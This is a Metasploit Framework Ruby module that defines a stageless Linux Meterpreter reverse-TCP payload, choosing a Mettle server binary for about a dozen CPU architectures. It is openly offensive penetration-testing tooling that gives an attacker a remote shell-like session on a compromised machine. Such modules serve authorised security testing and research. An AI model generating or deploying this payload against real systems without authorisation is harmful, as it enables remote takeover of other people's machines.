##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Module generated by tools/modules/generate_mettle_payloads.rb
module MetasploitModule
  CachedSize = 1140752

  include Msf::Payload::Single
  include Msf::Sessions::MeterpreterOptions
  include Msf::Sessions::MettleConfig

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Linux Meterpreter, Reverse TCP Inline',
        'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
        'Author' => [
          'Adam Cammack <adam_cammack[at]rapid7.com>',
          'Brent Cook <brent_cook[at]rapid7.com>',
          'timwr'
        ],
        'Platform' => 'linux',
        'Arch' => ARCH_ANY,
        'License' => MSF_LICENSE,
        'Handler' => Msf::Handler::ReverseTcp,
        'Session' => Msf::Sessions::MeterpreterMultiLinux
      )
    )
  end

  def generate(opts = {})
    case opts[:arch]
    when ARCH_AARCH64
      mettle_arch = 'aarch64-linux-musl'
    when ARCH_ARMBE
      mettle_arch = 'armv5b-linux-musleabi'
    when ARCH_ARMLE
      mettle_arch = 'armv5l-linux-musleabi'
    when ARCH_MIPS64
      mettle_arch = 'mips64-linux-muslsf'
    when ARCH_MIPSBE
      mettle_arch = 'mips-linux-muslsf'
    when ARCH_MIPSLE
      mettle_arch = 'mipsel-linux-muslsf'
    when ARCH_PPC
      mettle_arch = 'powerpc-linux-muslsf'
    when ARCH_PPCE500V2
      mettle_arch = 'powerpc-e500v2-linux-musl'
    when ARCH_PPC64LE
      mettle_arch = 'powerpc64le-linux-musl'
    when ARCH_X64
      mettle_arch = 'x86_64-linux-musl'
    when ARCH_X86
      mettle_arch = 'i486-linux-musl'
    when ARCH_ZARCH
      mettle_arch = 's390x-linux-musl'

    else
      mettle_arch = nil
    end
    opts = {
      scheme: 'tcp',
      stageless: true
    }.merge(mettle_logging_config)
    MetasploitPayloads::Mettle.new(mettle_arch, generate_config(opts)).to_binary :exec
  end

  def include_send_uuid
    true
  end
end
